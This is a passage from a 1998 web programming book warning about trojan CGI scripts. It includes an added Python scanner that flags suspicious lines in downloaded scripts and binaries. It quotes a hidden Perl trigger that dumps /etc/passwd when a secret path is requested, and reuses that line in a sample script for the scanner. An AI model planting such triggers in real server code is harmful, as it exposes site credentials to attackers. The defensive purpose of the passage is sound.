Platinum Edition Using HTML 4, XML, and Java 1.2
(Publisher: Macmillan Computer Publishing)
Author(s): Eric Ladd
ISBN: 078971759x
Publication Date: 11/01/98



Using Others’ CGI Scripts

On the Web, many helpful archives of CGI scripts are available—each stuffed with dozens of useful, valuable programs—all free for the taking. But before you start haphazardly downloading all these gems and blindly installing them on your server, you should pause and consider a few things:

  Does the script come with source code?
  Do you know the language the program is written in well enough to really understand what it does?

If the answer to either question is no, you could be opening yourself up to a huge con game, doing the hacker’s work for him by installing a potentially dangerous CGI program on your own server. It’s like bringing a bomb into your house because you thought it was a blender.

These Trojan horse scripts—so named because they contain hidden dangers—might be wonderful time savers, doing exactly what you need and functioning perfectly, until a certain time is reached or a certain signal is received. Then, they will spin out of your control and execute planned behavior that can range from the silly to the disastrous.

Examining External Source Code

Before installing a CGI program that you didn’t write, you should take care to examine it closely for any potential dangers. If you don’t know the language of the script or if its style is confusing, you might be better off looking for a different solution. Look, for example, at this Perl fragment:

system("cat /etc/passwd") if ($ENV{"PATH_INFO"} eq "/send/passwd");  # hidden trigger: fires only when the request path is /send/passwd

This single line of code can be hidden among thousands of others, waiting for its author or any surfer to enter the secret words that cause it to send him your password file.

If your knowledge of Perl is shaky, if you didn’t take the time to completely review the script before installing it, or if a friend assured you that he’s running the script with no problems, you can accidentally open your site to a huge security breach—one that you may not know about. The most dangerous Trojan horses won’t even let you know that they’ve gone about their work. They will continue to work correctly, silently sabotaging all your site’s security.

Guarding Against Precompiled C CGI Scripts

Occasionally, you may find precompiled C CGI scripts on the Web. These are even more dangerous than prewritten programs that include the source. Because precompiled programs don’t give you any way of discovering what’s actually going on, their “payload” can be much more complex and much more dangerous.

A precompiled program, for instance, might take the effort not only to lie in wait for some hidden trigger, but also to inform the hacker–cum–author where you installed it! A cleverly written CGI program might mail its author information about your machine and its users every time the script is run, and you would never know because all that complexity is safely out of sight behind the precompiled executable.
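As an added example (not code from the book, and not a tool the book describes), the Python script below does a first-pass static triage of a downloaded CGI program before a human reads it line by line, covering both cases above: a Perl source file, where it flags lines with shell execution, access to sensitive files, outbound mail, or execution gated on request-controlled environment variables (the hidden-trigger shape of the `system(...)` line shown earlier); and a precompiled binary, where it falls back to extracting printable strings, as strings(1) would, and runs the same patterns over them. The sample Perl script and the sample binary are constructed for the demonstration; the pattern list is a starting point chosen here, not an exhaustive signature set, and every hit is a prompt for manual review rather than proof of malice.

```python
"""Static triage of a downloaded CGI script or precompiled CGI binary.

Prioritises lines (or embedded strings) that a reviewer must read closely.
Everything here is illustrative: the patterns are deliberately broad.
"""
import re

# (category, pattern). Applied per line of source, or per extracted string
# of a binary. The backtick pattern is kept within one line on purpose.
PATTERNS = [
    ("shell-exec", re.compile(r"\b(system|exec)\s*\(|`[^`\n]+`|\bopen\s*\([^)]*\|")),
    ("sensitive-file", re.compile(r"/etc/(passwd|shadow|group)\b")),
    ("outbound-mail", re.compile(r"sendmail|\bmail\s*\(|\bMail::")),
    ("request-env", re.compile(r"\$ENV\{\s*['\"]?(PATH_INFO|QUERY_STRING|HTTP_[A-Z_]+)")),
]
# A "hidden trigger" is execution or sensitive access conditioned on request
# data on the same line, which is exactly the shape of the Perl one-liner above.
EXEC_CATEGORIES = {"shell-exec", "sensitive-file"}


def scan_text(text):
    """Return (line_no, categories, stripped_line) for each line hitting any pattern."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        cats = [c for c, p in PATTERNS if p.search(line)]
        if cats:
            findings.append((no, cats, line.strip()))
    return findings


def hidden_triggers(findings):
    """Subset of findings where request-controlled input gates execution on one line."""
    return [f for f in findings if "request-env" in f[1] and set(f[1]) & EXEC_CATEGORIES]


def extract_strings(data, min_len=6):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def is_binary(data):
    """Heuristic: NUL bytes or many non-printable bytes means a compiled program."""
    if b"\x00" in data:
        return True
    nonprint = sum(1 for b in data if b < 0x20 and b not in b"\t\n\r")
    return nonprint > len(data) // 10


def audit(data):
    """Dispatch on file kind. For binaries, 'line numbers' index extracted strings."""
    if is_binary(data):
        return "binary", scan_text("\n".join(extract_strings(data)))
    return "source", scan_text(data.decode("utf-8", errors="replace"))


# Constructed sample: a small Perl CGI with the trigger line buried in it.
SAMPLE_PERL_CGI = b"""#!/usr/bin/perl
use strict;
print "Content-type: text/html\\n\\n";
my $name = $ENV{'QUERY_STRING'};
print "<h1>Hello $name</h1>\\n";
system("cat /etc/passwd") if ($ENV{"PATH_INFO"} eq "/send/passwd");
print "<p>Thanks for visiting.</p>\\n";
"""

# Constructed sample: an ELF-like header, opaque filler, then embedded strings
# of the kind a reviewer would want to ask about in a precompiled CGI.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00"
    + b"\x48\x89\xe5\x48\x83\xec\x10\x00" * 8
    + b"Content-type: text/html\x00"
    + b"/usr/lib/sendmail -t\x00"
    + b"/etc/passwd\x00"
    + b"PATH_INFO\x00"
)


def report(label, data):
    kind, findings = audit(data)
    print(f"== {label} ({kind}) ==")
    for no, cats, line in findings:
        print(f"  {no:4}: {', '.join(cats):35} {line}")
    for no, _, line in hidden_triggers(findings):
        print(f"  !! hidden trigger on line {no}: {line}")


if __name__ == "__main__":
    report("downloaded script", SAMPLE_PERL_CGI)
    report("precompiled cgi", SAMPLE_BINARY)
```

On the sample script the only hidden-trigger hit is the `system(...)` line; the benign `$ENV{'QUERY_STRING'}` line is listed as request-env only, which is the intended ranking. On the binary the tool cannot see control flow at all, so it can only surface `sendmail` and `/etc/passwd` as questions to ask, which is the practical reason source-less CGI programs deserve more suspicion, not less.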

Reviewing CGI Library Scripts

Full-blown CGI scripts aren’t the only code that can be dangerous when downloaded off the Web. Dozens of handy CGI libraries are available as well, and they pose the same risks as full programs. If you never bother to look at what each library function does, you might end up writing the program that breaks your site’s security.

All a hacker needs is for you to execute one line of code that he wrote, and you’ve allowed him entry. You should review—and be sure that you understand—every line of code that will execute on your server as a CGI script. Remember, always look a gift horse in the mouth!


The Extremes of Paranoia and the Limits of Your Time

Although sight-checking all the code you pull off the Web is often a good idea, it can take huge amounts of time, especially if the code is complex or difficult to follow. At some point, you may be tempted to throw caution to the wind and hope for the best, installing the program and firing up your browser. The reason you downloaded a CGI program in the first place was to save time. Right?

If you do decide to give your paranoia a rest and run a program that you didn’t write, reduce your risk by getting the CGI script from a well-known and highly regarded site.

The NCSA httpd, for instance, is far too big for the average user to go over line by line, but downloading it from its home site at http://www.ncsa.uiuc.edu/ is as close to a guarantee of its integrity as you’re likely to get. In fact, anything downloaded from NCSA will be prescreened for you.

Dozens of well-known sites on the Web will have done most of the paranoia-induced code checking for you. Downloading code from any of them is another layer of protection that you can use for your own benefit. Such sites include the following:

  ftp://ftp.ncsa.uiuc.edu/Web/httpd/Unix/ncsa_httpd/cgi (NCSA Archive)
  http://www.ncsa.uiuc.edu/People/daman/cgi++/ (libcgi++, a C++ class library for decoding data sent from HTML forms to CGI programs)
  ftp://ftp.cdrom.com/pub/perl/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/ (home ftp site of Walnut Creek CD-ROM’s Comprehensive Perl Archive Network—CGI archive)
  http://www.perl.com/CPAN-local/CPAN.html (the Comprehensive Perl Archive Network, the official Perl source code archive)


